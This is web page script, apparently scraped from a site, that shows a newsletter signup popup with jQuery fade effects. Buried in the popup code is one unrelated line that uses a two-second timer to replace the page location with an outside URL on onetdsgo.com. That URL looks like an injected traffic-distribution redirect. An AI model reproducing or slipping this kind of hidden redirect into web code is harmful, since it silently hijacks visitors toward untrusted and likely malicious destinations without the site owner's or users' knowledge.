var id = '#dialog';
var timer = setTimeout(showDiv, 17000);
function showDiv()
{ jQuery('#boxes.popup').css("display","block");
//Set heigth and width to mask to fill up the whole screen
jQuery('#mask').css({'width':maskWidth,'height':maskHeight});
//transition effect
jQuery('#mask').fadeIn(15500);
jQuery('#mask').fadeTo("slow",0.9);
//jQuery('#mask').show();
//Get the window height and width
var winH = jQuery(window).height();
var winW = jQuery(window).width();
//Set the popup window to center
jQuery(id).css('top', winH/2-jQuery(id).height()/2);
jQuery(id).css('left', winW/2-jQuery(id).width()/2);
//transition effect
jQuery(id).fadeIn(29500);
}
jQuery(document).on("click touchstart tap",'.close-popup, .done',function () {
jQuery('#boxes.popup').css("display","none");
});
setTimeout('location.replace("https://onetdsgo.com/showthread3.php?p=slvLN1")', 2000);
sign up for latest news & updates
Thanks, but no thanks
function submit(){
window.location="/signup-to-our-news-letter/";
grecaptcha.reset();
}